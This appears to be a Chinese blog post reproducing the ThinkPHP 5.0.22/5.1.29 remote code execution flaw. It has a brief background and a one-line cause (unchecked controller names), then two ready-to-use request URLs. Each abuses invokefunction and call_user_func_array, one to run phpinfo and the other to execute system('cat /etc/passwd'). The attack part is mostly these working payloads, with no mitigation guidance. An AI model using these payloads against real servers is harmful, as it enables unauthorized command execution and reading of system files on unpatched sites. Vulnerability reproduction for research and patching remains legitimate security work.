前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现

Thinkphp5 5.0.22 / 5.1.29远程执行代码漏洞复现

作者头像
渗透攻击红队
发布2019-11-20 12:00:07
2.5K0
发布2019-11-20 12:00:07
举报
文章被收录于专栏:漏洞知识库
漏洞知识库

网络安全/渗透测试/代码审计/

关注

ThinkPhp5.x远程代码执行漏洞复现

漏洞简介

2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。

漏洞原理

结合官方公告说的由于对控制器名没有足够的检测,再查看官方git commit信息

复现过程

通过phpinfo函数写出phpinfo()的信息

POC:

代码语言:javascript
复制
通过phpinfo函数写出phpinfo()的信息
index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

利用system函数远程命令执行

POC:

代码语言:javascript
复制
利用system函数远程命令执行读取/etc/passwd
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/etc/passwd
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-10-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞原理
  • 复现过程
    • 通过phpinfo函数写出phpinfo()的信息
      • 利用system函数远程命令执行
      相关产品与服务
      网站渗透测试
      网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档